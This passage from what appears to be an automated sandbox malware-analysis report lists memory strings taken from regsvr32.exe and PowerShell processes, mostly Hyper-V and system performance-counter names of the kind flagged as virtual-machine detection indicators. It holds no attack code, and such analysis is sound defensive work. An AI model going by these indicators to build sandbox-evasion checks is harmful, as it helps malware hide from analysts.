Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O T
Source: regsvr32.exe, 0000000E.00000003.1916940382.0000000002D1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1917236724.0000000002D1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WorkflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache F
Source: regsvr32.exe, 0000000E.00000003.1943562354.00000000046B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WorkflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Contex
Source: regsvr32.exe, 00000007.00000003.1739496251.0000000004177000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1740743242.0000000004171000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WorkflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot
Source: regsvr32.exe, 0000000E.00000003.1946843482.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1949631756.0000000002C99000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2025942210.0000000002CD4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2021032450.00000000054E6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2023547613.0000000002CC1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Hyper-V Hypervisors
Source: powershell.exe, 00000008.00000002.1808266215.0000000002CEA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Vet-RunspaceDebug", "Wait-MSFT_NetEventVmNetworkAdatper.format.ps1xmlsh",
Source: regsvr32.exe, 0000000E.00000003.1946843482.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1949631756.0000000002C99000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2025942210.0000000002CD4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2021032450.00000000054E6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2023547613.0000000002CC1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2Hyper-V VM Vid Partition\E
Source: regsvr32.exe, 0000000E.00000003.1946843482.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1949631756.0000000002C99000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2025942210.0000000002CD4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2021032450.00000000054E6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2023547613.0000000002CC1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sWDHyper-V Hypervisor Root PartitionE
Source: regsvr32.exe, 00000007.00000003.1774249330.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1889243051.0000000002832000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1776480094.0000000002818000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885935311.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917374555.0000000002833000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor)
Source: regsvr32.exe, 0000000E.00000003.1916768218.0000000002D29000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WorkflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB F
Source: regsvr32.exe, 00000007.00000003.1774249330.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1889243051.0000000002832000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1776480094.0000000002818000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885935311.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917374555.0000000002833000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration Service(
Source: regsvr32.exe, 00000007.00000003.1885973380.0000000005000000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2021032450.000000000548C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2025831243.0000000002C7A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1946843482.0000000005495000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Partition:
Source: regsvr32.exe, 0000000E.00000003.1910675629.0000000002D36000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1914843123.0000000002D35000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1913859553.0000000002D3B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WorkflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Statu
Source: regsvr32.exe, 00000007.00000003.1774249330.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1889243051.0000000002832000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1776480094.0000000002818000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885935311.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917374555.0000000002833000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration Service4
Source: regsvr32.exe, 0000000E.00000003.1943440411.000000000471A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WorkflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware
Source: regsvr32.exe, 00000007.00000003.1774249330.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1889243051.0000000002832000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1776480094.0000000002818000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885935311.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917374555.0000000002833000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V mqabcqtdeleiepv Bus PipesU
Source: powershell.exe, 00000011.00000002.1982918321.0000000005319000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
Source: regsvr32.exe, 00000007.00000002.2917797838.0000000004238000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: regsvr32.exe, 00000007.00000003.1885973380.0000000005000000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2021032450.000000000548C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2025831243.0000000002C7A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1946843482.0000000005495000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Virtual ProcessorF
Source: regsvr32.exe, 00000007.00000003.1774249330.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1889243051.0000000002832000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1776480094.0000000002818000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885935311.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917374555.0000000002833000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical Processor\v
Source: regsvr32.exe, 0000000E.00000003.1946843482.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1949631756.0000000002C99000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2025942210.0000000002CD4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2021032450.00000000054E6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2023547613.0000000002CC1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Partition
Source: powershell.exe, 00000008.00000002.1808266215.0000000002CEA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FeSource", "Set-TraceSourcMSFT_NetEventVmNetworkAdatper.cdxmle",
Source: regsvr32.exe, 0000000E.00000003.2021032450.000000000548C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2025831243.0000000002C8D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2025223425.0000000002C8B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1946843482.0000000005495000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration Service
Source: regsvr32.exe, 00000007.00000003.1741996276.0000000004182000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1740304586.0000000004182000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WorkflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count
Source: regsvr32.exe, 00000007.00000003.1774249330.0000000004EED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885935311.0000000004EED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917306069.00000000027DA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2020697105.00000000047C3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1947196504.00000000047A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration Service
Source: regsvr32.exe, 00000007.00000003.1774249330.0000000004EED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885935311.0000000004EED000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917306069.00000000027DA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2020697105.00000000047C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine Bus Pipess
Source: regsvr32.exe, 00000007.00000003.1885973380.000000000505B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1946843482.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1949631756.0000000002C99000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2025942210.0000000002CD4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2021032450.00000000054E6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2023547613.0000000002CC1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical Processorh]
Source: regsvr32.exe, 00000007.00000003.1885973380.0000000005000000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2021032450.000000000548C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2025831243.0000000002C8D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2025223425.0000000002C8B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1946843482.0000000005495000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Logical Processori
Source: regsvr32.exe, 00000007.00000003.1774249330.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1889243051.0000000002832000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1776480094.0000000002818000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885935311.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917374555.0000000002833000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Logical Processorl
Source: powershell.exe, 00000011.00000002.2009636665.0000000007862000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FMSFT_NetEventVmNetworkAdatper.cdxml
Source: regsvr32.exe, 0000000E.00000003.1946843482.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1949631756.0000000002C99000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2025942210.0000000002CD4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2021032450.00000000054E6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2023547613.0000000002CC1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Logical Processorll
Source: regsvr32.exe, 00000007.00000003.1885973380.000000000505B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1946843482.00000000054F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1949631756.0000000002C99000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2025942210.0000000002CD4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2021032450.00000000054E6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.2023547613.0000000002CC1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V mqabcqtdeleiepv Bus Pipes'f
Source: regsvr32.exe, 00000007.00000003.1774249330.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1889243051.0000000002832000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1776480094.0000000002818000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1885935311.0000000004F45000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.2917374555.0000000002833000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine Bus PipesPM
Source: regsvr32.exe, 00000007.00000003.1744337012.0000000004177000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WorkflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switche
Source: regsvr32.exe, 0000000E.00000003.1916940382.0000000002D1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1917236724.0000000002D1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost5032Debug Register Accesses/sec5034Debug Register Acce
Source: powershell.exe, 00000011.00000002.2009636665.0000000007862000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMSFT_NetEventVmNetworkAdatper.format.ps1xml
